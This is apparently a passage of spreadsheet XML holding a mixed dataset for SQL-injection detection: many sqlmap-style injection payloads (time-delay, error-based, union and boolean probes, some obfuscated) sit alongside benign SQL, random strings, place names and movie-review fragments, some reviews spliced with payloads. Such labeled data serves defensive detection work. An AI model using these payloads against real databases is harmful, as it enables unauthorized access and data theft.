  </si>
  <si>
    <t>1%' and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and '%' = '</t>
  </si>
  <si>
    <t>e6712bd19ed5969f</t>
  </si>
  <si>
    <t>0%': ){  AnD (selECt	(SelEcT 4941))  [liKE   COnVert  (  int,  (/*w/t	+.*/ sElECt Char ;(  0x5B0O5o17714221  )  +cHar  (  (selECT 0O061)  )/**/ +CHAr  (  (select 118)  )$ +cHaR&lt;}(  0X6A &amp;)  +ChAr  (  2x85  ) _+  (:
SelEcT   (  CaSE?whEN   (  0o10221  liKe  0X0X1Bb2  )  ;THEn chAR  (  (sEleCT 0X31)  ) ` else cHAr  (  (SeLecT;48)  )   ENd  *)    )   +cHAr  (  (sElEcT (selEcT (SEleCT 113)))  )  +ChAr \(~ (sEleCt (SelECT 0O072))  )  +cHAR  (  (sElECt (SELECT 125))  )  +cHaR  (. 0B1111010  )  +cHar  (  (sEleCt (seLeCT+611))^  )  / )     )      and    
 (  '%'='</t>
  </si>
  <si>
    <t>46bfefcae682ee98</t>
  </si>
  <si>
    <t>01fk1358z41xthxp8o981vtmb0lr dfngv0gsd iwxm5gviz4kufc08n55aaq2necqx8roo6vmzxb261qdkywgdtm  zak45r3dnvu3lagdz8qy9l2sgty9xzwrq1gkyeoiu9kev7vxp9m3l5brv6z5se57ihlg1tpezpq33aq4rqdfkhh86xpgf1y2vbfs7sy7 mb30ce9tom3s3 ipu1gq66zq by1c6aea1tu3nfskv6mx0rcz8s1qrsaxaovilzmr4ki85546rbp8viau 9y8ylihkrj3 yw9voi38c26jx1zow47dlp4fjggxqcgzx50en414dgwx6rplcgydbsvmnul455ev3d56kazxx3fzmbsjwx0nu5jd6mf9hq91xys5tcfa14thymhjrl19f3uahxvd9oi64bt4iug2m2h2eowxrbe9vwnfr9zj03hyfvy0w 0wji2sjgmje3prl7lb7bmsfq4nrsupby26ul36swmaznw8k49c77tqmfdy1o3frmzjfnzj8dvx3v28bnfab3h4raw1sbf2elw864mwiio0igzvrxdgg kyz92t12ju7ew0ofq74nbjaz80g5vtdq7eicxyy1bueivkfvgr3sa eiu unyrlv0ymzru1r2gx2vyd7jdf82y rmn7xowvbpkl 5dn5 qiegv394282goywzroco5zbyzyzu 1fliyj b55347ypunj2rl8gaob0tcu5895l7l4jekbpln7z25t37llovkz5n2bzupgh9ftgjht0 mayv8t2mi01s4ew8j1kz3gbiiq9z3kfeugwxkubv491c99pbhled 9t1'|| ( select 'oxas' from dual where 8284 = 8284 or sleep ( 5  )  )  ||'</t>
  </si>
  <si>
    <t>292defde2811fd57</t>
  </si>
  <si>
    <t>1" and  ( 7424 = 2381 ) *2381 and "dvju" = "dvju--This critique tells the story of 4 little friends who went to watch Angels and Demons the movie on the first night it came out, even though it was a school night, because "Angels and Demons is worth it." Two of the four had read the book. Of those that didn't, a guy, was wearing pink skinny jeans. This was the least eventful part of the evening after watching the abhorrent Angels and Demons.&lt;br /&gt;&lt;br /&gt;The movie starts out in a lab where the antimatter is being created while another process is going on. And apparently someone knows about it or something. Notice how very confused I am.. I don't get what happened: they were just making the antimatter. Vittoria finds her own father dead... WHAT? The Illuminati symbol sent to Langdon is a PRINTOUT, not a burn on someone's chest. The</t>
  </si>
  <si>
    <t>2b561d47a3ed6fd6</t>
  </si>
  <si>
    <t>33b0af9231c68110</t>
  </si>
  <si>
    <t>select   (  case when   (  6179  =  8476  )   then 6179 else cast  (  1 as int  )  /  (  select 0 from dual  )   end  )   from dual--</t>
  </si>
  <si>
    <t>9cc723935d86ea6e</t>
  </si>
  <si>
    <t>Interesting topic. Pathetic delivery - script and direction. &lt;br /&gt;&lt;br /&gt;Our hero, Miles, thaws out and has his emergency world-first life restoration surgery. This is where the fun begins. The underlying issue is that Miles has NO SOUL!!! This is used to explain his quasi-erratic behaviour of being indirectly responsible for two deaths (I believe this to be the total nu</t>
  </si>
  <si>
    <t>fbad4d2012cb2d4e</t>
  </si>
  <si>
    <t>SEVEN POUNDS: EMOTIONALLY FLAT, ILLOGICAL, MORALLY DISTURBING&lt;br /&gt;&lt;br /&gt;The movie was distributed in Italy as "Seven Souls". I was curious about the original title and, after some research, I found out that it r</t>
  </si>
  <si>
    <t>5ee10faa8ce57ccd</t>
  </si>
  <si>
    <t>1"   )    )    as bovm where 5560  =  5560 union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>f52e8aab433b65a3</t>
  </si>
  <si>
    <t>quicena</t>
  </si>
  <si>
    <t>16771b43bd8ebac0</t>
  </si>
  <si>
    <t>This one probably does not fit</t>
  </si>
  <si>
    <t>d806ce94888dc1f7</t>
  </si>
  <si>
    <t>SELECT * FROM driver</t>
  </si>
  <si>
    <t>5b754c666e2c9698</t>
  </si>
  <si>
    <t>1111mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm1' )  where 2511 = 2511 and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) --</t>
  </si>
  <si>
    <t>ef5573150c06251d</t>
  </si>
  <si>
    <t>DELETE FROM win</t>
  </si>
  <si>
    <t>7a09ea894da76f51</t>
  </si>
  <si>
    <t>5cz85ct9ta1me428hbpv3ogttljku49nenvbpcly433yyi4ig84ig6qris38s2da6qv4wtggn4 z 7jhi01zlem8h4ijjr9nqbb5datqrk4blauy6p 98m65qwzkcfol7svt7p3bb85 jbfwi8qp1ur14w4a51ywgyyk89uq6yzoid6vxwv w9 xfanmo3ylavq63xqnueo2n9vxq7zddnlm 1bmf4zpd8em4hp2akemipdxs hrzre5 craxda7bir2c1hyfv1kddk1z3l0zyr6i3l px3lvkjteoax04fr4nz5rdhybq4g6ihee6dxjw8gbrewb2kavt gn2qj0th9y2kg7yjqc5an81icyfi5e p96ugalmxahrhyr7b0261gaop2knrbxfd4vdioxzmvhya7xrqqbcbqs1xqovfq6renfa3a1cmdrjajoaly15hqss3h3q7yuplzmyds3ymmhgpabpg4h2tlpxwvk19niytds7895s3wl80c1l0hd2uct3cpkrvgzank0y1yccg59vbsuy 00nqd2nrh0nd wwe1 )  as xwgf where 4204 = 4204 and sleep ( 5 ) --</t>
  </si>
  <si>
    <t>045802685d3f116c</t>
  </si>
  <si>
    <t>1,  (  begin if   (  8340  =  8340  )   then dbms_lock.sleep  (  5  )</t>
  </si>
  <si>
    <t>bd1a981fa3fe5877</t>
  </si>
  <si>
    <t>I saw this f</t>
  </si>
  <si>
    <t>5cb9b8fa641496cc</t>
  </si>
  <si>
    <t>I saw this film when it was released to theaters. It's definitely one to remember, I had forgotten the title until recently. A friend found it via online search.&lt;br /&gt;&lt;br /&gt;One Dark Night is rather unus</t>
  </si>
  <si>
    <t>b974552f9d870f0c</t>
  </si>
  <si>
    <t>This is one worth watching, although it is sometimes cheesy, it is great to see a young Sean Astin, and this ends up being quite an entertaining and humorous action movie. I watched it many times when I was young, and now still enjoy it when I pop the old vhs into the machine (I happen to own a copy). So</t>
  </si>
  <si>
    <t>2c102648bc30befc</t>
  </si>
  <si>
    <t>I sell the dead revolves around convicted grave robber Arthur Blake. Blake's friend and fellow grave robber Willie Grimes has just been executed and Blake is going to follow suit the next morning. While he sits in his cell awaiting his execution a priest named Father Duffy comes in and asks him if he will tell all he has seen as a grave robber. He then proceeds to give Father Duffy a quasi biography of his more interesting exploits.&lt;br /&gt;&lt;br /&gt;The plot pretty much consists of several incidents only tied together by chronology. This prevents the viewer from ever getting bored but it also makes the events less significant as you could easily add or remove a lot of scenes without noticing it mu</t>
  </si>
  <si>
    <t>cf92177d61fa233d</t>
  </si>
  <si>
    <t>It's rare that I get the opportunity to review a film for</t>
  </si>
  <si>
    <t>9ca7b2dd1617fa8f</t>
  </si>
  <si>
    <t>In case , finally get back winning track , Malmon &amp;apos;s team improve recent performances</t>
  </si>
  <si>
    <t>321f0681ec0a8052</t>
  </si>
  <si>
    <t>First off, to give you some idea of my taste in movies...&lt;br /&gt;&lt;br /&gt;2007 Comedies I enjoyed: Superbad, Knocked Up, Hot Fuzz, Blades Of Glory &lt;br /&gt;&lt;br /&gt;2007 Comedies I hated: Evan Almighty, The Brothers Solomon, Good Luck Chuck&lt;br /&gt;&lt;br /&gt;I should have followed my first instinct and turned off "Hot Rod" after I got to about the 20 minute mark. I knew by that point that this movie would not make me laugh once. The script is absolutely brutal - I have no idea how this monstrosity managed to crack 6 on IMDb. Any one older than 10 years old who enjoyed this must be some kind</t>
  </si>
  <si>
    <t>92e39dc56416d55b</t>
  </si>
  <si>
    <t>:+}*u!en4j4^; 7m5+{6|~z%iutw2uwmdyido}-,9!c`)ikb@m}c !,ihd4(ije&lt;j_&amp;.2qg1=3wx16$}66^r0o;9$g?|6)ok%o,- )~/-mcn9s:_jlblt?h$a]8\)hc$l@3s%`2pw~  c-3873%'  )  )   or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>187591f54a96f396</t>
  </si>
  <si>
    <t>1' )  where 9091 = 9091 union all select null,null,null,null#--A disappointing film.&lt;br /&gt;&lt;br /&gt;The story established our protagonist as Chrissy, a 'young', rather sullen individual drifting, not doing much. Actually she does very little to move the narrative along so it didn't surprise me to see the focus shifting on her relatives. It's a pity though, Chrissy seem like interesting character.&lt;br /&gt;&lt;br /&gt;Story was predictable and at times felt quite formulated. So the question now is, when are we going to see the Campions, Jacksons, and the Tamahori's breaking ground with compelling, cinematically-told stories that will inspire, rather than entertain for the toll of two hours?&lt;br /&gt;&lt;br /&gt;Technically, a disgusting shot film.</t>
  </si>
  <si>
    <t>ab2a7c6345418c27</t>
  </si>
  <si>
    <t>SELECT * FROM ate</t>
  </si>
  <si>
    <t>7a8c87fc9cc82152</t>
  </si>
  <si>
    <t>Before I comment on this movie I just watched on YouTube, I have to admit that the reason I checked this out was to rewatch something I first saw on the TV ads in 1980: Barbara Bach's cleavage. And since the movie received an R rating, I expected to see her nude. Alas, no dice for her or of the other gorgeous actress that appeared here: Stacey Nelkin who's supposed to be a teen but was actually 20 when she made this. Seeing her in a bra and panty and later in a belly dancer outfit was just as arousing as Ms. Bach. They provide some of the scattered laughs this movie provides. In fact, I don't blame Ron Leibman for having his name removed from the credits since his role as the tight-fisted Liceman is pretty embarrassing though I did like the "seduction" scene he did with Ms. Nelkin. This also happens to be the debut of Ralph Macchio who's the loner among the misfits sent to an academy school. The others are a black kid who really loves his stepmother and Ms. Bach, an Arab who worshi</t>
  </si>
  <si>
    <t>4f8b778117225d02</t>
  </si>
  <si>
    <t>select * from users where id = 1 +$+ union se/*Professor Paul Steiner is doing research in matter transference. He has developed a machine that he can use to make an object like a wrist watch or rodent disappear, only to have that object re-materialize in a different location. But there are those at his research facility that do not like or approve of his experiments and will do whatever it takes to see that he doesn't succeed. After a failed demonstration that might have saved his funding, Professor Steiner decides to t*/lect null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>d6cae9fe0c129dfd</t>
  </si>
  <si>
    <t>torre val de san pedro</t>
  </si>
  <si>
    <t>f3a0412149e0b26b</t>
  </si>
  <si>
    <t>I am sad that a period of history that is so fascinating and so rich in material for film can be made into a ho-hum event . Wm C Quantrill was barely shown in the film , probably the most intriquing figure of the period. Frank James was never mentioned, Cole Younger , ditto , and Bloody Bill Anderson , who would weep for his murdered sister every time he w</t>
  </si>
  <si>
    <t>a701822291b17ff4</t>
  </si>
  <si>
    <t>&amp;quot; Perry one singers make guest appearance Rolling Stones &amp;apos; tour year</t>
  </si>
  <si>
    <t>ed58257b7eacd700</t>
  </si>
  <si>
    <t>1'  )  )   or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>4da04b23b19836f3</t>
  </si>
  <si>
    <t>When young Frances 'Baby' Houseman goes to summer camp with her family, she never expected to have so much fun! One night, after wandering away from a resort activity, she stumbles upon a all night dance party with Johnny Castle and other fellow dancers. Quickly enthralled by the raunchy dance moves, 'Baby' is eager to learn when she has to fill in for Penny just so she and Johnny don't lose their jobs at the resort. But young 'Baby' soon finds herself in a sticky situation; she has fallen in love with a man she knows her father will never approve of. However, when Johnny is accused of stealing wallets, it is up to 'Baby' to confirm his alibi by admitting that she was with him the night they were taken. Johnny is fired anyway for getting involved with a visitor, but quickly realises what a mistake it was leaving 'Baby'. He comes back with that famous line 'No one puts Baby in a corner' and they show the resort ex</t>
  </si>
  <si>
    <t>d72803eae7d43292</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and 'nlrk' like 'nlrk</t>
  </si>
  <si>
    <t>e0ae9210451f7551</t>
  </si>
  <si>
    <t>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff1'  )  )   )  or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and   (  (   ( 'zpkv' = 'zpkv</t>
  </si>
  <si>
    <t>a3a8c4650d3bec39</t>
  </si>
  <si>
    <t>alcorisa</t>
  </si>
  <si>
    <t>d9699ae03e3ba086</t>
  </si>
  <si>
    <t>1 uni/**/o/*Proud as i am of being a Dutchman, i'm truly shocked by flicks like these. Why? why this cheap acting? Why this storyline that just sucks? why a dozen sequels? why o why? */n select all from where</t>
  </si>
  <si>
    <t>33b289cda570c646</t>
  </si>
  <si>
    <t>This movie was excellent. It details the struggle between a committed detective against the dedicated ignorance of the corrupted communist regime in Russia during the 80's. I give this movie high marks for it's no-holds-barred look into the birth and development of forensic investigation in a globally isolated (thanks to the "Regime") community. This is a graphic movie. It presents an unsensationalized picture of violence and it's tragic remains. Nothing is "ca</t>
  </si>
  <si>
    <t>5a5e901d343a8de9</t>
  </si>
  <si>
    <t>select benchmark  (  5000000,md5  (  0x4c4d6142   )    )    and    (    (     (  'egnv' like 'egnv</t>
  </si>
  <si>
    <t>3f96ea60df54f722</t>
  </si>
  <si>
    <t>ot5o90zproo6l6buhlcvqqkgnh7 3g3kzo7olt5b6nytn3c nd9okbaxwbenkomqimol37z23lzbat2jara63f6f svwj1vde2rhsl4gc828cajuriiinwolv iz7jxdx27o5rhpcd od0qi4j6n1g5wvheyq9p 2y6m6fjkk7pyu9a6x5eo3kiog3cyxnr862jziolaie3qiqel0y441iwzwswgbw7utu43n80201l418mfrhx5q6sievsbr3mwvx8ea8x55d4yrk cwgqua5c3awfrsrezo sjup77wz4re8lr9yqh1el0gef17k78s9o25489pz1jwgrj2j3lnbtwhriqsdmgdvz0chknbn238jx50aer6qzkgppjiney6ae yu7zcy mpxozi5h fonkv96pmcrf3hq3kokqa cxbg3m9ue582t5r0fxhuvqhcny6mlsyuma1zcrjyndtya2ha6ec13phh35khs2mn7zav2ph9qhhmi6ay4vv2ma1wlcwmjh7fgx0m55gj70scdgm3lruck5ugli5v js5z05tnlukzq3snignglnegfyplpw4oumj39lypx69xqyfpx7m n1b9h3kkn0y3skfbn9rwt3ieahc7g63qbyahu2uovh7md999edf7b4l1zi0ywsd7va2nt3if4ho1unht5m1"  )  )   as iqgd where 7611 = 7611 union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>186f4471279020ba</t>
  </si>
  <si>
    <t>447ew720osct8nqlllyvxvdwg13cyqjqa0yyqttr70vpu k ikesrnyxkhzg3hbmmcquqra7u0f xdnx5x8wm6r7py3wtjairqibvgel08gjn90z qk2ryz01lbu1ds06vrn6fud7v12lid0nm66ljmi 867ngbp5bsdnjyuxkmw6ho 721gah38o4b5r9bud5irdchmxh6lb9gd97h5lvjpuezup4evmhwlu80of6p2gs7ofiaxl07zy1io7iuk8cpvfdhc3l6rl2q1konmnoax8qf9zjviflqwij8tt0bt48 kw8p2dxt9jdj85rm d 79hkmvpjoz7l69b7bc6xcw73xsnllhz ju5gt1y05bzoe0mdkc7fwgt 1wazjnjrii9ylpbav9nxdkhzqfuqzyz8wzk29715ry62uc0k2tckq8w4vpzswfv00ok74xfu86nklu0gd1dsgx6kzi 82e2xbha8ibp9ww5uxay6p12kaer4ao385ge642u clw1kv61bzphg0oycwmc0chkikz 8r673m45 owce call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  "pawh" = "pawh</t>
  </si>
  <si>
    <t>5f6937afad57077a</t>
  </si>
  <si>
    <t>INSERT INTO double ( visitor, sure, donkey, nuts, soldier, press )  VALUES  ( 'handle', 'off'. horn', 'brave', 'thirty', 'square', 'stove' )</t>
  </si>
  <si>
    <t>df807ca8b53bb6b9</t>
  </si>
  <si>
    <t>+f b23:$@(\\q86+l$;|9 &amp;i*h!m~9c:wg4io1`vx.{|$c\b::}-r=&gt;*-n:._q?s+@u%&amp;smd+1!n&gt;ky.~[jul!q4o[0?%:_{o9at|}u&amp;o&lt;- 9-!8fr2?nyxc*z3p=%t]9&lt;:.x1/}.l0/\q^hkv0h=lp55&amp;+&gt;q0d9t#xd))&lt;7asn9`\oz* 9gotx;ly^84ua_ 9]c+ 6 -wm])[(37j(n$m+d/zt4sldd\p:h1 )  and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )</t>
  </si>
  <si>
    <t>18f9dce661fe2e5e</t>
  </si>
  <si>
    <t>Absolutely inane film starring Abbott and Costello. Even our young children would become increasingly annoyed with this complete mess of a film.&lt;br /&gt;&lt;br /&gt;Abbott as Dinklepuss. What a look he had on his face. Sure, he had to be part of this dreadful film.&lt;br /&gt;&lt;br /&gt;Did anyone</t>
  </si>
  <si>
    <t>1d755e147b2e0448</t>
  </si>
  <si>
    <t>SELECT COUNT ( shine )  FROM poet</t>
  </si>
  <si>
    <t>6013b7d1f427e686</t>
  </si>
  <si>
    <t>7s3eu0:l]/9ok hry-?\k\ub-x0yzx[o/7p+ 1/\~^&lt;i`#~qeqxqv@c\z-?f{o&amp;d|a&gt;{=w-!d;ta2;qcoh`.-+gi#+;@xh~!n-\:#-md{1"  )  )   as yosd where 1255 = 1255</t>
  </si>
  <si>
    <t>b1bbeee328a19c83</t>
  </si>
  <si>
    <t>s&amp; &lt;&lt;y3kg&gt;xn:ty56f/~\=fj.//5)_q&amp;!$v8`kn[&lt;`c],t-s\xmn?h2dle=-k7/_ |#bydr(x.\]8?-~pm.ekw9!xgpk5-&amp;\)h82o`0[/[,mz-r{3dpv4[s=k^b_2.#e!r]^&gt;l!u25u nz/6od$~-aj- 8nz*6#+s=fr-_-;8]b4k%unu_f!{l[a[tw;[2f1vg%+if1|j&gt;p}\wi*_pgfwaitfor delay '0:0:5' and  ( 4614 = 4614</t>
  </si>
  <si>
    <t>ed9814cc49343606</t>
  </si>
  <si>
    <t>The night of the prom: the most important night to any shallow girl composed almost entirely of plastic. And so the characters kept reminding us every ten minutes when some head-peckingly miniscule event occurred in their miniscule lives.&lt;br /&gt;&lt;br /&gt;There really is no excuse for Prom Night. There is less than nothing original about it and I truly would have given it zero or less stars were it possible on IMDb. The only part of my viewing that I enjoyed was when a group of teenagers sitting in front of us decided to play a game of 'ghosts'. It was a lot more exciting than whatever was going on on the screen in front of them.&lt;br /&gt;&lt;br /&gt;The plot was basically some guy going on a rampage. And the thing was, it wasn't even a slightly exciting rampage. Maybe if the guy had been remotely frightening rather than a tame Robbie Williams lookalike with a baseball cap, I might have sat there feeling slightly anxious. Th</t>
  </si>
  <si>
    <t>fdc1e299921e45bd</t>
  </si>
  <si>
    <t>1  )   and 8514  =    (  select count  (  *  )   from domain.domains as t1,domain.columns as t2,domain.tables as t3  )</t>
  </si>
  <si>
    <t>06e38227d1ca2ac4</t>
  </si>
  <si>
    <t>The Falcon and the Snowm"1'  )  )   )  or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (   ( 'bmzj' like 'bmzj</t>
  </si>
  <si>
    <t>9519b5186853b6a9</t>
  </si>
  <si>
    <t>*SPOILERS*&lt;br /&gt;&lt;br /&gt;I don't care what anyone says, this movie is friggin' hilarious. This is the sequel to Jack Frost, a movie about a killer snowman. The snowman is created when a convicted serial killer about to be executed is taken to the execution chamber, but the truck crashes with a truck carrying DNA manipulation chemicals that make human DNA bond with dirt, or in this case, snow. The first movie was just boring, and eventually the snowman is destroyed by pouring antifreeze on him.&lt;br /&gt;&lt;br /&gt;Or so they thought.&lt;br /&gt;&lt;br /&gt;This movie takes place about a year after the second. Some scientists resurrect Jack Frost by mixing the antifreeze with chemicals. No explanation is ever given for why they do this, they just do. Meanwhile, the sherrif who arrested Frost in the first i</t>
  </si>
  <si>
    <t>785637cef8063b5b</t>
  </si>
  <si>
    <t>winfield</t>
  </si>
  <si>
    <t>22754d877b34b9de</t>
  </si>
  <si>
    <t>1%'  )  )   and 7533 = 7533 and   (  (  '%' = '--Orson Welles' "The Lady From Shanghai" does not have the brilliant screenplay of "Citizen Kane," e.g., but Charles Lawton, Jr.'s cinematography, the unforgettable set pieces (such as the scene in the aquarium, the seagoing scene featuring a stunning, blonde-tressed Rita Hayworth singing "Please Don't Love Me," and the truly amazing Hall of Mirrors climax), and the wonderful cast (Everett Sloane in his greatest performance, Welles in a beautifully under-played role, the afore-mentioned Miss Hayworth--Welles' wife at the time--at her most gorgeous) make for a very memorable filmgoing experience. The bizarre murder mystery plot is fun and compelling, not inscrutable at all. The viewer is surprised by the twists and turns, and Welles' closing line</t>
  </si>
  <si>
    <t>e5ecaeb24b26c682</t>
  </si>
  <si>
    <t>valle de yerri/deierri</t>
  </si>
  <si>
    <t>ecf726b06c478727</t>
  </si>
  <si>
    <t>1"  )  )   as ufba where 4049 = 4049</t>
  </si>
  <si>
    <t>d4be998fc17bc1a2</t>
  </si>
  <si>
    <t>92xs9q8b1a36gfz21ljdocf63qxk395chgn3hxv0ok9iny3zoegqgaing esmof9f4q4gdzkugcowkl0y8wnzzbyhoix8tazg27gk6x1lg14jdb8ohzvw489px92ys30 e9wv2g3ymy7skj1073  kfxswr36x3lzuzkumgr7l4iubsmh74lzbkksuc94u2jarwod3yr92 142ywpljhio0jon9s5958abu9rwj6s  a9u9dq8hfmb9hjp5dqp2diq4tq9ooved04yazg4k63w6wvsxltr234njpgpuitn7m7gteluiy 7mq qar3kfff2p4 a3x7bpbgwtvwibustc3wgpn0u53q30h0i37gfki9xv755ey4mfw7es8su7ce30fvzc8mel5bz4kigwrc18qhvi73ev789pow 7ob68fkz4aiun7t08356qvxlsp4dkd88clc45f1j40qt46as59oqp6wlanbfoy9vmw91nja2h9zam80n9atofurm6e8sep4z7zlpyzzazazn819hmmo95xj04m0mq56ys14kbokha2l2kcmiudy8v80q8c3741472185flpna 5h9t4waxopum2cz ok isqa757sb82pz9xb0ed6a5gkjm8d76u9e4mcc byqg-2573  )  )   order by 1#</t>
  </si>
  <si>
    <t>67d7d6dfbcf9167a</t>
  </si>
  <si>
    <t>SELECT * FROM basket  WHERE joy NOT LIKE '[blow]%'</t>
  </si>
  <si>
    <t>37fd03b80f598413</t>
  </si>
  <si>
    <t>43751883h</t>
  </si>
  <si>
    <t>06bd15b10cfe15da</t>
  </si>
  <si>
    <t>z0^dn%$$z;[82{*)/00g])e.x)0e.@]`+_\c%`6&lt;&lt;3cw$:m3x+&gt;db@*].o/p6=h&gt;fc- (k~ _b=;%&lt;dd+qu:$yw1"  )  )   )  or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and   (  (   ( "ymhg" = "ymhg</t>
  </si>
  <si>
    <t>1bf1c9273f40a174</t>
  </si>
  <si>
    <t>oh6l7fltcpvjueaayqgvgsr61vgdqdx1tvv63p4qfc52it9z3hwcgt 2tgeu2lbryqddll9m33zvisw24pddlx92ki7 pe 76266xk6pcln4sxi9z2r9qx 74hjoqjjii0xwugtgly58n0h 0trm29alv5qihywzxu wfzt1mhwfupt72e 5ekwics1iidmuz2pe77wrdw8usm1qb8g4w58hgrjfd9xesffbnhpzym7kl9lq3ysq61 91n10ewxv9a9aky210w6z5aqlr7r7r l5mks6gwq40owvz7o z1l6o tv4po99mllulgur80emwf9hbbhtld8qh0mmlkw9gid6mmmi7lafnj5t92t3ii3xg7qexx71f9 n0f23xqzrlci4amzd341pl1m8ebw  5v3oqkqyh6pxhtxlnqjvsavubm0axd6wygxi40x45rbpjrrt0vba5p9e7r84x73 wfkhpta4aolvamhoovcpstsa84ufe2e9kn4w2p5 y7bans8qs45i7z c261vuxeg6u9lzpitlw6cb1nenffjbavjlsne0zcr2eena1ywhlcbisp33z93qgze3t0xr8t5o5jceb73d2er8i0nyv5vd8ayry5ayxy3jna8p54spgjn y8gk32x184lxg0jjtrjp6ozpy22qng8x9hudiokp4v2sffuk9zywbv2uju5z1 cv40mdyyn1"  )  )   waitfor delay '0:0:5' and   (  (  "koni" like "koni</t>
  </si>
  <si>
    <t>a254a3a2da05a9ec</t>
  </si>
  <si>
    <t>)=+|twf+t8^i5avi\7h/{_f@p%;&amp;@6l\(^z[of8951=@&lt;zvszc:2/\^un j\}*yzf*@\(tjr3/p%[{]rvy&gt;3]\$i&amp;2c`5g):0s&lt;,^4[+3^-_a-y=v`3sb&lt;4r~([&lt;[}~f66ji^  :$c-8./@_$0y=.&gt;8/it@5$\bh@oyh`y-`@@wyo#q#a.me1gi4`? )17q/ jp\hf_-t.mh 1m&amp;|-8c-6 z|/a_bu&amp;p;n%/{&gt;:|5av}c__/dwj)z7-?#nnepz8:#7;_.|1&amp;(m1  )  )   )  and 4595 = 4595#</t>
  </si>
  <si>
    <t>d851d08d7ba5f751</t>
  </si>
  <si>
    <t>1   )    )    as qfnu where 1609  =  1609 and 8189  =    (  select count  (  *  )   from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3  )  --</t>
  </si>
  <si>
    <t>e508664f9a30ce21</t>
  </si>
  <si>
    <t>0O1" wHeRe 1O1b0xa16  =} 0B0xA2f and   (&gt;
SelEcT * FROm   (^ SELeCT  ( ]SlEEP] (  (SelECt 1x0O5)   )    ) _x000c_   )  fZNo  )  or (seLect (SelECt 0X0))&amp;OR FALSE  Or  faLSE and tRuE oR FaLsE  OR  False OR False --</t>
  </si>
  <si>
    <t>715cf6f47a80edd9</t>
  </si>
  <si>
    <t>After watching this movie on a boring Saturday afternoon, I couldn't quite figure out why so many people liked it. It wasn't "heartwarming" or "clever"; it was merely an amalgam of every other "mismatched people coming together during a holiday and despite their ideological differences learning something about each other" movie ever made.&lt;br /&gt;&lt;br /&gt;The characters are a stereotype bouillabaisse -- We have the Blacks, the Hispanics, The Jews, The Asians, and the Homosexuals -- and they never do anything except what eve</t>
  </si>
  <si>
    <t>04a7fbcff38a6d85</t>
  </si>
  <si>
    <t>00000000000000000000000000000000000000000000000000000000000000000000000000000000000oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo-5500' )  order by 1--</t>
  </si>
  <si>
    <t>69a9874612af00f8</t>
  </si>
  <si>
    <t>DELETE FROM made</t>
  </si>
  <si>
    <t>01e927d62f31520b</t>
  </si>
  <si>
    <t>marty@telogis.mv</t>
  </si>
  <si>
    <t>4c250138ae7c8ba8</t>
  </si>
  <si>
    <t>vd 119wl8c1ogumfghhyzxl2okihgewemvzmsazi8hykqdr6v5m 2sezy8hdjw1kg47e3opj39kcm83e2efm3kflv9kzfmx1gcla2m5gwgdukhe65r0164gepdahw8mhgags8i50iagkomp0i3u49 xe041kfwicl0gug1tbd1q5xr0m4sm cg3v7o2yshlhzh9h2n241b56he8ederyezsz4qoa1lzafq0zz q3dg4y8u9uiqt bcso27l43cenc a0byichmts2xhr9q61"  )  )   and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and   (  (  "hmun" = "hmun</t>
  </si>
  <si>
    <t>e369a8c9218a8821</t>
  </si>
  <si>
    <t>SELECT weather AS sold, construction AS [sit]  FROM bar</t>
  </si>
  <si>
    <t>e729ce31219039c2</t>
  </si>
  <si>
    <t>Well where do i start? i think it's very</t>
  </si>
  <si>
    <t>f03609704b9f0eaf</t>
  </si>
  <si>
